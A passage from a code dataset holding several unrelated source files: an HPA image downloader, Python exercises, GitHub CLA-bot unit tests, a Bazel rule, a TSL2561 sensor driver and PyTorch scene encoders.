'blue':\n channel = channel[:, :, 0]\n elif channel_name == 'yellow':\n channel = (0.5 * channel[:, :, 2] + 0.5 * channel[:, :, 1]).astype(np.uint8)\n else:\n raise Exception('unexpected channel name \"{}\"'.format(channel_name))\n\n return channel\n\n\ndef parse_xml(gene_id):\n result = []\n\n tree = ET.parse('{}/xmls/{}.xml'.format(BASE_HPA_EXT_DIR, gene_id))\n sub_assay_elements = tree.findall(\".//cellExpression/subAssay[@type='human']\")\n for sub_assay_element in sub_assay_elements:\n verification = sub_assay_element.findall('./verification')[0].text.lower()\n if verification == 'approved':\n data_elements = sub_assay_element.findall(\"./data\")\n for data_element in data_elements:\n location_elements = data_element.findall('./location')\n # locations = [(l.attrib['GOId'], l.text) for l in location_elements]\n locations = []\n for location_element in location_elements:\n location = PROTEINS.index(location_element.text)\n if location < 28:\n locations.append(location)\n if len(locations) > 0:\n image_url_elements = 
data_element.findall(\"./assayImage/image/imageUrl\")\n for image_url_element in image_url_elements:\n image_url = image_url_element.text\n if not image_url.startswith(IMAGE_URL_PREFIX) or not image_url.endswith(IMAGE_URL_SUFFIX):\n raise Exception('unexpected image URL \"{}\"'.format(image_url))\n image_id = image_url[len(IMAGE_URL_PREFIX):-len(IMAGE_URL_SUFFIX)].replace('/', '_')\n result.append((image_id, locations))\n\n return result\n\n\ndef analyze():\n colors = ['red', 'green', 'blue', 'yellow']\n id_colors = {}\n for f in glob.glob('{}/pngs/*.png'.format(BASE_HPA_EXT_DIR)):\n b = os.path.basename(f)\n for c in colors:\n s = '_{}.png'.format(c)\n if b.endswith(s):\n id = b[:-len(s)]\n ic = id_colors.setdefault(id, [])\n ic.append(c)\n id_colors[id] = ic\n\n print('found {} samples'.format(len(id_colors)), flush=True)\n\n for k, v in id_colors.items():\n if len(v) != len(colors):\n print('sample \"{}\" only has colors {}'.format(k, v), flush=True)\n\n\nif __name__ == \"__main__\":\n os.makedirs('{}/images'.format(BASE_HPA_EXT_DIR), exist_ok=True)\n os.makedirs('{}/pngs'.format(BASE_HPA_EXT_DIR), exist_ok=True)\n os.makedirs('{}/xmls'.format(BASE_HPA_EXT_DIR), exist_ok=True)\n\n df = pd.read_csv('./analysis/subcellular_location.tsv', sep='\\t', index_col='Gene')\n\n print('downloading xmls...', flush=True)\n with Pool(64) as pool:\n pool.map(download_xml, df.index.tolist())\n\n print('parsing xmls...', flush=True)\n sample_ids = []\n sample_targets = []\n with Pool(64) as pool:\n for samples in pool.map(parse_xml, df.index.tolist()):\n for sample in samples:\n sample_ids.append(sample[0])\n sample_targets.append(sample[1])\n print(len(sample_ids))\n\n print('downloading images...', flush=True)\n with Pool(64) as pool:\n pool.map(download_image, sample_ids)\n\n print('converting images to pngs...', flush=True)\n with Pool(64) as pool:\n pool.map(convert_to_png, glob.glob('{}/images/*.jpg'.format(BASE_HPA_EXT_DIR)))\n\n analyze()\n\n print('exporting results...', flush=True)\n train_df = pd.read_csv('{}/train.csv'.format(BASE_HPA_DIR), index_col='Id')\n external_df = pd.DataFrame(index=sample_ids, data={'Target': [' '.join(list(map(str, t))) for t in sample_targets]})\n combined_df = pd.concat([train_df, external_df])\n combined_df.to_csv('{}/train_extended.csv'.format(BASE_HPA_DIR), index_label='Id')\n","sub_path":"download_hpa_data.py","file_name":"download_hpa_data.py","file_ext":"py","file_size_in_byte":6793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"162979474","text":"\"\"\"\n# @Time : 2020/7/18\n# @Author : Jimou Chen\n\"\"\"\n\n\nclass A(str):\n def __new__(cls, string):\n string = string.upper()\n return str.__new__(cls, string)\n\n\na = A('hello World')\nprint(a)\n\n\nclass B:\n def __init__(self):\n print('构造函���被调用')\n\n def __del__(self):\n print('析构函数被调用')\n\n\nb1 = B()\nb2 = b1\nb3 = b2\ndel b3\ndel b2\ndel b1\n\n\n# 重写加减法,继承int类\nclass Int(int):\n def __add__(self, other):\n return int.__sub__(self, other)\n\n def __sub__(self, other):\n return int(self) + int(other)\n # 或者return int.__add__(self, other)\n\n\na = Int(5)\nb = Int(4)\nprint(a + b, a - b)\n","sub_path":"PythonLearning/ClassTest/magic_method.py","file_name":"magic_method.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"371873453","text":"#\n# @lc app=leetcode.cn id=8 lang=python\n#\n# [8] 字符串转换整数 (atoi)\n#\n\n# @lc code=start\nclass 
Solution(object):\n def myAtoi(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n if not s:\n return 0\n max_int = 2 ** 31 - 1\n min_val = -2 ** 31\n\n index, sign, result = 0, 1, 0\n lens = len(s)\n while index < lens and s[index] == ' ' :\n index += 1\n \n if index < lens and (s[index] == '+' or s[index] == '-'):\n sign = 1 if s[index] == '+' else -1\n index += 1\n \n while index < lens:\n digit = ord(s[index]) - ord('0')\n if digit < 0 or digit > 9:\n break\n\n if max_int // 10 < result or (max_int // 10 == result and max_int % 10 < digit):\n return max_int if sign == 1 else min_val\n\n result = result * 10 + digit\n index += 1\n\n return sign * result\n# @lc code=end\n\n","sub_path":"Week_09/8.字符串转换整数-atoi.py","file_name":"8.字符串转换整数-atoi.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"272885452","text":"import asyncio\nimport copy\nfrom http import client\nimport json\nimport pathlib\nimport unittest\nfrom urllib import parse\n\nfrom aiohttp import hdrs, web\n\nfrom .. import abc as ni_abc\nfrom .. import github\nfrom . import util\n\n\nclass OfflineHost(github.Host):\n\n \"\"\"A subclass of github.Host which does not touch the network.\"\"\"\n\n def __init__(self, *args, network, **kwargs):\n super().__init__(*args, **kwargs)\n self._network = network\n\n async def get(self, client, url):\n return self._network[('GET', url)]\n\n async def post(self, client, url, payload):\n expected = self._network[('POST', url)]\n assert expected == payload, '{!r} != {!r}'.format(payload, expected)\n\n async def delete(self, client, url):\n assert self._network[('DELETE', url)]\n\n\ndef example(file_name):\n this_dir = pathlib.Path(__file__).parent\n examples = this_dir / 'examples' / 'github'\n example = examples / file_name\n with example.open('r', encoding='utf-8') as file:\n return json.load(file)\n\n\nclass GitHubTests(util.TestCase):\n\n acceptable = {github.PullRequestEvent.opened,\n github.PullRequestEvent.unlabeled,\n github.PullRequestEvent.synchronize}\n\n @classmethod\n def setUpClass(cls):\n github.EASTEREGG_PROBABILITY = 0.0\n cls.opened_example = example('opened.json')\n cls.unlabeled_example = example('unlabeled.json')\n cls.synchronize_example = example('synchronize.json')\n cls.commits_example = example('commits.json')\n cls.commits_url = 'https://api.github.com/repos/Microsoft/Pyjion/pulls/109/commits'\n cls.issues_example = example('issues.json')\n cls.issues_url = 'https://api.github.com/repos/Microsoft/Pyjion/issues/109'\n cls.labels_example = example('labels.json')\n cls.labels_url = 'https://api.github.com/repos/Microsoft/Pyjion/issues/109/labels'\n cls.comments_url = 'https://api.github.com/repos/Microsoft/Pyjion/issues/109/comments'\n\n def test_bad_content_type(self):\n # Only accept 'application/json'.\n # https://developer.github.com/webhooks/creating/#content-type\n request = util.FakeRequest(content_type='application/x-www-form-urlencoded')\n with self.assertRaises(ni_abc.ResponseExit) as cm:\n self.run_awaitable(github.Host.process(util.FakeServerHost(), request))\n self.assertEqual(cm.exception.response.status, 415)\n\n def test_ping(self):\n # GitHub can ping a webhook to verify things are set up.\n # https://developer.github.com/webhooks/#ping-event\n payload = {'zen': 'something pithy'}\n with self.assertRaises(ni_abc.ResponseExit) as cm:\n self.run_awaitable(github.Host.process(util.FakeServerHost(),\n util.FakeRequest(payload)))\n 
self.assertEqual(cm.exception.response.status, 200)\n\n    def test_process_skipping(self):\n        # Only create a ContribHost object if the PR is opened, unlabeled, or\n        # synchronized.\n        for event in github.PullRequestEvent:\n            if event in self.acceptable:\n                continue\n            payload = {'action': event.value}\n            request = util.FakeRequest(payload)\n            with self.assertRaises(ni_abc.ResponseExit) as cm:\n                self.run_awaitable(github.Host.process(util.FakeServerHost(),\n                                                       request))\n            self.assertEqual(cm.exception.response.status, 204)\n\n    def test_process_opened(self):\n        request = util.FakeRequest(self.opened_example)\n        result = self.run_awaitable(github.Host.process(util.FakeServerHost(),\n                                                        request))\n        self.assertEqual(result.event, github.PullRequestEvent.opened)\n\n    def test_process_unlabeled(self):\n        # Test a CLA label being removed.\n        unlabeled_example_CLA = copy.deepcopy(self.unlabeled_example)\n        unlabeled_example_CLA['label']['name'] = github.CLA_OK\n        request = util.FakeRequest(unlabeled_example_CLA)\n        result = self.run_awaitable(github.Host.process(util.FakeServerHost(),\n                                                        request))\n        self.assertEqual(result.event, github.PullRequestEvent.unlabeled)\n        # Test a non-CLA label being removed.\n        unlabeled_example_other = copy.deepcopy(self.unlabeled_example)\n        unlabeled_example_other['label']['name'] = 'missing something or other'\n        request = util.FakeRequest(unlabeled_example_other)\n        with self.assertRaises(ni_abc.ResponseExit) as cm:\n            self.run_awaitable(github.Host.process(util.FakeServerHost(),\n                                                   request))\n        self.assertEqual(cm.exception.response.status, 204)\n\n    def test_process_synchronize(self):\n        request = util.FakeRequest(self.synchronize_example)\n        result = self.run_awaitable(github.Host.process(util.FakeServerHost(),\n                                                        request))\n        self.assertEqual(result.event, github.PullRequestEvent.synchronize)\n\n    def test_check_response(self):\n        # Throw a fit for anything that isn't a 2XX response.\n        github.Host.check_response(web.Response(status=202))\n        with self.assertRaises(Exception):\n            github.Host.check_response(web.Response(status=301))\n        with self.assertRaises(Exception):\n            github.Host.check_response(web.Response(status=404))\n        with self.assertRaises(Exception):\n            github.Host.check_response(web.Response(status=502))\n\n    def test_usernames(self):\n        # Should grab logins from the creator of the PR, and both the author\n        # and committer for every commit in the PR.\n        what = ('GET', self.commits_url)\n        network = {what: self.commits_example}\n        contrib = OfflineHost(util.FakeServerHost(),\n                              github.PullRequestEvent.opened,\n                              self.opened_example,\n                              network=network)\n        got = self.run_awaitable(contrib.usernames(util.FakeSession()))\n        want = {'brettcannon', 'rbtcollins-author', 'rbtcollins-committer',\n                'dstufft-author', 'dstufft-committer'}\n        self.assertEqual(got, frozenset(want))\n\n    def test_labels_url(self):\n        # Get the proper labels URL for a PR.\n        network = {('GET', self.issues_url): self.issues_example}\n        contrib = OfflineHost(util.FakeServerHost(),\n                              github.PullRequestEvent.opened,\n                              self.opened_example,\n                              network=network)\n        got = self.run_awaitable(contrib.labels_url(util.FakeSession()))\n        want = self.labels_url.format_map({'/name': ''})\n        self.assertEqual(got, want)\n\n        got = self.run_awaitable(contrib.labels_url(util.FakeSession(),\n                                                    github.CLA_OK))\n        label = parse.quote(github.CLA_OK)\n        want = '{}/{}'.format(self.labels_url, label)\n        self.assertEqual(got, want)\n\n    def test_current_label(self):\n        # Test getting the current CLA label (if any).\n        network = {('GET', self.issues_url): 
self.issues_example}\n contrib = OfflineHost(util.FakeServerHost(),\n github.PullRequestEvent.synchronize,\n self.synchronize_example,\n network=network)\n # No label set.\n network[('GET', self.labels_url)] = []\n label = self.run_awaitable(contrib.current_label(util.FakeSession()))\n self.assertIsNone(label)\n # One CLA label set.\n network[('GET', self.labels_url)] = self.labels_example\n label = self.run_awaitable(contrib.current_label(util.FakeSession()))\n self.assertEqual(label, github.CLA_OK)\n # Two CLA labels set (error case).\n network[('GET', self.labels_url)] = [{'name': github.CLA_OK},\n {'name': github.NO_CLA}]\n label = self.run_awaitable(contrib.current_label(util.FakeSession()))\n # Just don't blow up.\n self.assertIsNotNone(label)\n\n def test_set_label(self):\n # If the status is \"signed\" then add the positive label, else use the\n # negative one.\n network = {('GET', self.issues_url): self.issues_example,\n ('POST', self.labels_url): [github.CLA_OK]}\n contrib = OfflineHost(util.FakeServerHost(),\n github.PullRequestEvent.opened,\n self.opened_example,\n network=network)\n label = self.run_awaitable(contrib.set_label(util.FakeSession(),\n ni_abc.Status.signed))\n self.assertEqual(label, github.CLA_OK)\n network[('POST', self.labels_url)] = [github.NO_CLA]\n label = self.run_awaitable(contrib.set_label(util.FakeSession(),\n ni_abc.Status.not_signed))\n self.assertEqual(label, github.NO_CLA)\n self.run_awaitable(contrib.set_label(util.FakeSession(),\n ni_abc.Status.username_not_found))\n self.assertEqual(label, github.NO_CLA)\n\n def test_remove_label(self):\n # Remove all CLA-related labels.\n deletion_url = self.labels_url + '/' + parse.quote(github.CLA_OK)\n network = {('GET', self.issues_url): self.issues_example,\n ('GET', self.labels_url): self.labels_example,\n ('DELETE', deletion_url): True}\n contrib = OfflineHost(util.FakeServerHost(),\n github.PullRequestEvent.synchronize,\n self.synchronize_example,\n network=network)\n deleted = self.run_awaitable(contrib.remove_label(util.FakeSession()))\n self.assertEqual(deleted, github.CLA_OK)\n network[('GET', self.labels_url)] = []\n deleted = self.run_awaitable(contrib.remove_label(util.FakeSession()))\n self.assertIsNone(deleted)\n\n def test_comment(self):\n # Add a comment related to the status.\n network = {}\n contrib = OfflineHost(util.FakeServerHost(),\n github.PullRequestEvent.opened,\n self.opened_example,\n network=network)\n message = self.run_awaitable(contrib.comment(util.FakeSession(),\n ni_abc.Status.signed))\n self.assertIsNone(message)\n expected = {'body':\n github.NO_CLA_TEMPLATE.format(body=github.NO_CLA_BODY)}\n network[('POST', self.comments_url)] = expected\n message = self.run_awaitable(contrib.comment(util.FakeSession(),\n ni_abc.Status.not_signed))\n self.assertEqual(message, expected['body'])\n expected['body'] = github.NO_CLA_TEMPLATE.format(\n body=github.NO_USERNAME_BODY)\n network[('POST', self.comments_url)] = expected\n message = self.run_awaitable(contrib.comment(util.FakeSession(),\n ni_abc.Status.username_not_found))\n self.assertEqual(expected['body'], message)\n\n def test_update_opened(self):\n # Adding CLA status on an opened PR.\n comment = github.NO_CLA_TEMPLATE.format(body=github.NO_CLA_BODY)\n network = {('GET', self.issues_url): self.issues_example,\n ('POST', self.labels_url): [github.NO_CLA],\n ('POST', self.comments_url): {'body': comment}}\n contrib = OfflineHost(util.FakeServerHost(),\n github.PullRequestEvent.opened,\n self.opened_example,\n network=network)\n 
self.noException(contrib.update(util.FakeSession(), ni_abc.Status.not_signed))\n\n def test_update_unlabeled(self):\n # Adding CLA status to a PR that just lost its CLA label.\n network = {('GET', self.issues_url): self.issues_example,\n ('POST', self.labels_url): [github.CLA_OK]}\n contrib = OfflineHost(util.FakeServerHost(),\n github.PullRequestEvent.unlabeled,\n self.unlabeled_example,\n network=network)\n self.noException(contrib.update(util.FakeSession(), ni_abc.Status.signed))\n\n def test_update_synchronize(self):\n # Update the PR after it's synchronized.\n network = {('GET', self.issues_url): self.issues_example}\n contrib = OfflineHost(util.FakeServerHost(),\n github.PullRequestEvent.synchronize,\n self.synchronize_example,\n network=network)\n # CLA signed and already labeled as such.\n network[('GET', self.labels_url)] = self.labels_example\n self.noException(contrib.update(util.FakeSession(), ni_abc.Status.signed))\n # CLA signed, but not labeled as such.\n network[('GET', self.labels_url)] = [{'name': github.NO_CLA}]\n deletion_url = self.run_awaitable(\n contrib.labels_url(util.FakeSession(), github.NO_CLA))\n network[('DELETE', deletion_url)] = [github.NO_CLA]\n self.noException(contrib.update(util.FakeSession(), ni_abc.Status.signed))\n # CLA not signed and already labeled as such.\n network[('GET', self.labels_url)] = [{'name': github.NO_CLA}]\n self.noException(contrib.update(util.FakeSession(), ni_abc.Status.not_signed))\n # CLA not signed, but currently labeled as such.\n network[('GET', self.labels_url)] = [{'name': github.CLA_OK}]\n deletion_url = self.run_awaitable(\n contrib.labels_url(util.FakeSession(),github.CLA_OK))\n network[('DELETE', deletion_url)] = [github.CLA_OK]\n comment = github.NO_CLA_TEMPLATE.format(body=github.NO_CLA_BODY)\n network[('POST', self.comments_url)] = {'body': comment}\n self.noException(contrib.update(util.FakeSession(),\n ni_abc.Status.not_signed))\n # No GitHub username, but already labeled as no CLA.\n network[('GET', self.labels_url)] = [{'name': github.NO_CLA}]\n self.noException(contrib.update(util.FakeSession(),\n ni_abc.Status.username_not_found))\n # No GitHub username, but labeled as signed.\n network[('GET', self.labels_url)] = [{'name': github.CLA_OK}]\n deletion_url = self.run_awaitable(\n contrib.labels_url(util.FakeSession(), github.CLA_OK))\n network[('DELETE', deletion_url)] = [github.CLA_OK]\n comment = github.NO_CLA_TEMPLATE.format(body=github.NO_USERNAME_BODY)\n network[('POST', self.comments_url)] = {'body': comment}\n self.noException(contrib.update(util.FakeSession(),\n ni_abc.Status.username_not_found))\n\n\nclass NetworkingTests(util.TestCase):\n\n def test_get(self):\n # Test a GET request to a live GitHub API URL.\n contrib = github.Host(util.FakeServerHost(),\n github.PullRequestEvent.opened, {})\n url = 'https://api.github.com/repos/Microsoft/Pyjion/issues/109'\n payload = {'hello': 'world'}\n fake_session = util.FakeSession(data=payload)\n returned = self.noException(contrib.get(fake_session, url))\n self.assertEqual(payload, returned)\n self.assertEqual(fake_session.url, url)\n self.assertIn('Authorization', fake_session.headers)\n self.assertEqual(fake_session.headers['Authorization'],\n 'token ' + util.FakeServerHost.auth_token)\n # Test making a failed request.\n failed_response = util.FakeResponse(status=404)\n fake_session = util.FakeSession(response=failed_response)\n with self.assertRaises(client.HTTPException):\n self.run_awaitable(contrib.get(fake_session, url))\n\n def test_post(self):\n contrib 
= github.Host(util.FakeServerHost(), None, None)\n data = {'hello': 'world'}\n url = 'https://api.github.com/repos/Microsoft/Pyjion/issues/109'\n fake_session = util.FakeSession()\n self.noException(contrib.post(fake_session, url, data))\n self.assertEqual(fake_session.url, url)\n json_string = fake_session.data.decode('utf-8')\n self.assertEqual(json.loads(json_string), data)\n user_agent = fake_session.headers[hdrs.USER_AGENT]\n self.assertEqual(user_agent, util.FakeServerHost.user_agent_name)\n content_type = fake_session.headers[hdrs.CONTENT_TYPE]\n self.assertTrue(content_type.startswith('application/json'))\n self.assertIn('Authorization', fake_session.headers)\n self.assertEqual(fake_session.headers['Authorization'],\n 'token ' + util.FakeServerHost.auth_token)\n # Test making a failed request.\n failed_response = util.FakeResponse(status=404)\n fake_session = util.FakeSession(response=failed_response)\n with self.assertRaises(client.HTTPException):\n self.run_awaitable(contrib.post(fake_session, url, data))\n # Test no user-agent.\n fake_server = util.FakeServerHost()\n fake_server.user_agent_name = None\n contrib = github.Host(fake_server, None, None)\n data = {'hello': 'world'}\n url = 'https://api.github.com/repos/Microsoft/Pyjion/issues/109'\n fake_session = util.FakeSession()\n self.noException(contrib.post(fake_session, url, data))\n self.assertEqual(fake_session.url, url)\n json_string = fake_session.data.decode('utf-8')\n self.assertEqual(json.loads(json_string), data)\n self.assertNotIn(hdrs.USER_AGENT, fake_session.headers)\n\n def test_delete(self):\n contrib = github.Host(util.FakeServerHost(), None, None)\n data = {'hello': 'world'}\n url = 'https://api.github.com/repos/Microsoft/Pyjion/issues/109'\n fake_session = util.FakeSession()\n self.noException(contrib.delete(fake_session, url))\n self.assertEqual(fake_session.url, url)\n self.assertIn('Authorization', fake_session.headers)\n self.assertEqual(fake_session.headers['Authorization'],\n 'token ' + util.FakeServerHost.auth_token)\n # Test making a failed request.\n failed_response = util.FakeResponse(status=404)\n fake_session = util.FakeSession(response=failed_response)\n with self.assertRaises(client.HTTPException):\n self.run_awaitable(contrib.delete(fake_session, url))\n","sub_path":"ni/test/test_github.py","file_name":"test_github.py","file_ext":"py","file_size_in_byte":18893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"392740962","text":"import time\nimport Adafruit_GPIO.I2C as I2C\nfrom sensors.AbstractSensor import AbstractSensor\n\n\"\"\"\nDataSheet: https://cdn-shop.adafruit.com/datasheets/TSL2561.pdf\nProduct page: https://www.adafruit.com/product/439\nOriginal implementation: https://github.com/seanbechhofer/raspberrypi/blob/master/python/TSL2561.py\nComponent name: TSL2561\nCommunication protocol: i2c\n\"\"\"\n\n\nclass TSL2561(AbstractSensor):\n\n\tdef print_output(self):\n\t\tprint(__class__.__name__)\n\t\tprint(\"LUX HIGH GAIN \", self.read(16))\n\t\tprint(\"LUX LOW GAIN \", self.read(1))\n\t\tprint(\"LUX AUTO GAIN \", self.read())\n\t\tprint()\n\n\tdef __init__(self, address=0x39, debug=0, pause=0.8):\n\t\tself.i2c = I2C.Device(address, I2C.get_default_bus())\n\t\tself.address = address\n\t\tself.pause = pause\n\t\tself.debug = debug\n\t\tself.gain = 0 # no gain preselected\n\t\tself.i2c.write8(0x80, 0x03) # enable the device\n\n\tdef set_gain(self, gain=1):\n\t\t\"\"\" Set the gain \"\"\"\n\t\tif gain != self.gain:\n\t\t\tif gain == 
1:\n\t\t\t\tself.i2c.write8(0x81, 0x02) # set gain = 1X and timing = 402 mSec\n\t\t\t\tif self.debug:\n\t\t\t\t\tprint(\"Setting low gain\")\n\t\t\telse:\n\t\t\t\tself.i2c.write8(0x81, 0x12) # set gain = 16X and timing = 402 mSec\n\t\t\t\tif self.debug:\n\t\t\t\t\tprint(\"Setting high gain\")\n\t\t\tself.gain = gain # save gain for the lux calculation\n\t\t\ttime.sleep(self.pause) # pause for integration (self.pause must be bigger than integration time)\n\n\tdef read_word(self, reg):\n\t\t\"\"\"Reads a word from the I2C device\"\"\"\n\t\ttry:\n\t\t\twordval = self.i2c.readU16(reg)\n\t\t\tnewval = I2C.reverseByteOrder(wordval)\n\t\t\tif self.debug:\n\t\t\t\tprint(\"I2C: Device 0x%02X returned 0x%04X from reg 0x%02X\" % (self.address, wordval & 0xFFFF, reg))\n\t\t\treturn newval\n\t\texcept IOError:\n\t\t\tprint(\"Error accessing 0x%02X: Check your I2C address\" % self.address)\n\t\t\treturn -1\n\n\tdef read_full(self, reg=0x8C):\n\t\t\"\"\"Reads visible+IR diode from the I2C device\"\"\"\n\t\treturn self.read_word(reg)\n\n\tdef read_ir(self, reg=0x8E):\n\t\t\"\"\"Reads IR only diode from the I2C device\"\"\"\n\t\treturn self.read_word(reg)\n\n\tdef read(self, gain=0):\n\t\t\"\"\"Grabs a lux reading either with autoranging (gain=0) or with a specified gain (1, 16)\"\"\"\n\n\t\tir = None\n\t\tambient = None\n\t\tlux = None\n\n\t\tif gain == 1 or gain == 16:\n\t\t\tself.set_gain(gain) # low/highGain\n\t\t\tambient = self.read_full()\n\t\t\tir = self.read_ir()\n\t\telif gain == 0: # auto gain\n\t\t\tself.set_gain(16) # first try highGain\n\t\t\tambient = self.read_full()\n\t\t\tif ambient < 65535:\n\t\t\t\tir = self.read_ir()\n\t\t\tif ambient >= 65535 or ir >= 65535: # value(s) exceed(s) data range\n\t\t\t\tself.set_gain(1) # set lowGain\n\t\t\t\tambient = self.read_full()\n\t\t\t\tir = self.read_ir()\n\n\t\tif self.gain == 1:\n\t\t\tambient *= 16 # scale 1x to 16x\n\t\t\tir *= 16 # scale 1x to 16x\n\n\t\tratio = (ir / float(ambient)) # changed to make it run under python 2\n\n\t\tif self.debug:\n\t\t\tprint(\"IR Result\", ir)\n\t\t\tprint(\"Ambient Result\", ambient)\n\n\t\tif (ratio >= 0) and (ratio <= 0.52):\n\t\t\tlux = (0.0315 * ambient) - (0.0593 * ambient * (ratio ** 1.4))\n\t\telif ratio <= 0.65:\n\t\t\tlux = (0.0229 * ambient) - (0.0291 * ir)\n\t\telif ratio <= 0.80:\n\t\t\tlux = (0.0157 * ambient) - (0.018 * ir)\n\t\telif ratio <= 1.3:\n\t\t\tlux = (0.00338 * ambient) - (0.0026 * ir)\n\t\telif ratio > 1.3:\n\t\t\tlux = 0\n\n\t\treturn lux\n\n","sub_path":"sensors/TSL2561.py","file_name":"TSL2561.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"604038122","text":"def _hello_repo_impl(ctx):\n    ctx.file(\"hello.txt\", ctx.attr.message)\n    ctx.file(\"BUILD.bazel\", 'exports_files([\"hello.txt\"])')\n    ctx.file(\"ver.bzl\", 'VERSION = \"212.0.1.3\"\\n')\n\nhello_repo = repository_rule(\n    implementation = _hello_repo_impl,\n    attrs = {\n        \"message\": attr.string(\n            mandatory = True,\n        ),\n    },\n)\n","sub_path":"deps.bzl","file_name":"deps.bzl","file_ext":"bzl","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"424252067","text":"def iteracyjnie(arr, l, r, x):\n    while l < r:\n        if arr[l] == x:\n            return l\n        l = l + 1\n    return -1\n\n\ndef recSearch(arr, l, r, x):\n    if r < l:\n        return -1\n    if arr[l] == x:\n        return l\n    if arr[r] == x:\n        return r\n    return recSearch(arr, l + 1, r - 1, x)\n\n\narr = [12, 34, 54, 2, 3]\nn = len(arr)\nx = 
3\nindex = recSearch(arr, 0, n - 1, x)\nif index != -1:\n print(\"Element\", x, \"is present at index %d\" % index)\nelse:\n print(\"Element %d is not present\" % x)\nindex2 = iteracyjnie(arr, 0, n, x)\nif index2 != -1:\n print(\"Element\", x, \"is present at index %d\" % index2)\nelse:\n print(\"Element %d is not present\" % x)\n","sub_path":"cwiczenia3/liniowe.py","file_name":"liniowe.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"211227244","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 23 23:24:32 2017\n\n@author: agadipat\n\"\"\"\n\nfrom __future__ import division\nfrom __future__ import absolute_import\nimport math\nimport torch\nfrom torch import nn\nfrom torch.autograd import Variable\nfrom time import time\nfrom itertools import izip\n\n#########################################################################################\n## Encoder\n#########################################################################################\n\nclass Sampler(nn.Module):\n\n def __init__(self, feature_size, hidden_size):\n super(Sampler, self).__init__()\n self.mlp1 = nn.Linear(feature_size, hidden_size)\n self.mlp2mu = nn.Linear(hidden_size, feature_size)\n self.mlp2var = nn.Linear(hidden_size, feature_size)\n self.tanh = nn.Tanh()\n \n def forward(self, input):\n encode = self.tanh(self.mlp1(input))\n mu = self.mlp2mu(encode)\n logvar = self.mlp2var(encode)\n std = logvar.mul(0.5).exp_()\n eps = Variable(torch.FloatTensor(std.size()).normal_().cuda())\n KLD_element = mu.pow(2).add_(logvar.exp()).mul_(-1).add_(1).add_(logvar)\n return torch.cat([eps.mul(std).add_(mu), KLD_element], 1)\n\nclass BoxEncoder(nn.Module): # Box Encoder\n\n def __init__(self, input_size,feature_size): \n super(BoxEncoder, self).__init__()\n self.encoder = nn.Linear(input_size, feature_size)\n self.tanh = nn.Tanh()\n\n def forward(self, box_input):\n box_vector = self.encoder(box_input)\n box_vector = self.tanh(box_vector)\n return box_vector\n \nclass SuppEncoder(nn.Module): # Support Encoder\n\n def __init__(self, feature_size, relpos_size, hidden_size):\n super(SuppEncoder, self).__init__()\n self.left = nn.Linear(feature_size, hidden_size)\n self.right = nn.Linear(feature_size, hidden_size, bias=False)\n self.rightpos = nn.Linear(relpos_size, hidden_size, bias=False)\n self.second = nn.Linear(hidden_size, feature_size)\n self.tanh = nn.Tanh()\n\n def forward(self, left_input, right_input, relpos_right):\n output = self.left(left_input)\n output += self.right(right_input)\n output += self.rightpos(relpos_right)\n output = self.tanh(output)\n output = self.second(output) \n output = self.tanh(output)\n return output\n \nclass CoocEncoder(nn.Module): # Co-occurrence Encoder\n\n def __init__(self, feature_size, relpos_size, hidden_size):\n super(CoocEncoder, self).__init__()\n self.left = nn.Linear(feature_size, hidden_size)\n self.right = nn.Linear(feature_size, hidden_size, bias=False)\n self.rightpos = nn.Linear(relpos_size, hidden_size, bias=False)\n self.second = nn.Linear(hidden_size, feature_size)\n self.tanh = nn.Tanh()\n\n def forward(self, left_input, right_input, relpos_right):\n output = self.left(left_input)\n output += self.right(right_input)\n output += self.rightpos(relpos_right)\n output = self.tanh(output)\n output = self.second(output)\n output = self.tanh(output)\n return output\n\nclass SrndEncoder(nn.Module): # SURROUND Encoder\n\n def __init__(self, feature_size, relpos_size, 
hidden_size):\n super(SrndEncoder, self).__init__()\n self.left = nn.Linear(feature_size, hidden_size) \n self.right = nn.Linear(feature_size, hidden_size, bias=False) \n self.rightpos = nn.Linear(relpos_size, hidden_size, bias=False)\n self.center = nn.Linear(feature_size, hidden_size, bias=False) \n self.centerpos = nn.Linear(relpos_size, hidden_size, bias=False)\n self.second = nn.Linear(hidden_size, feature_size)\n self.tanh = nn.Tanh()\n\n def forward(self, left_input, center_input, relpos_center, right_input, relpos_right):\n output = self.left(left_input)\n output += self.center(center_input)\n output += self.centerpos(relpos_center)\n output += self.right(right_input)\n output += self.rightpos(relpos_right)\n output = self.tanh(output)\n output = self.second(output)\n output = self.tanh(output)\n return output\n\n \nclass R5Encoder(nn.Module): # Root Encoder class for merging all the 4 walls and the floor\n def __init__(self, feature_size, feature_size2, relpos_size,hidden_size):\n super(R5Encoder, self).__init__()\n self.rc1 = nn.Linear(feature_size, hidden_size) \n self.rc2 = nn.Linear(feature_size, hidden_size, bias=False) \n self.rc3 = nn.Linear(feature_size, hidden_size, bias=False) \n self.rc4 = nn.Linear(feature_size, hidden_size, bias=False) \n self.rc5 = nn.Linear(feature_size, hidden_size, bias=False) \n self.relpos_12 = nn.Linear(relpos_size, hidden_size, bias=False)\n self.relpos_13 = nn.Linear(relpos_size, hidden_size, bias=False) \n self.relpos_14 = nn.Linear(relpos_size, hidden_size, bias=False) \n self.relpos_15 = nn.Linear(relpos_size, hidden_size, bias=False)\n self.second = nn.Linear(hidden_size, feature_size2)\n self.tanh = nn.Tanh() \n\n def forward(self, rc1, rc2, relpos_12, rc3, relpos_13, rc4, relpos_14, rc5,relpos_15):\n output = self.rc1(rc1)\n output += self.rc2(rc2)\n output += self.relpos_12(relpos_12)\n \n output += self.rc3(rc3)\n output += self.relpos_13(relpos_13)\n \n output += 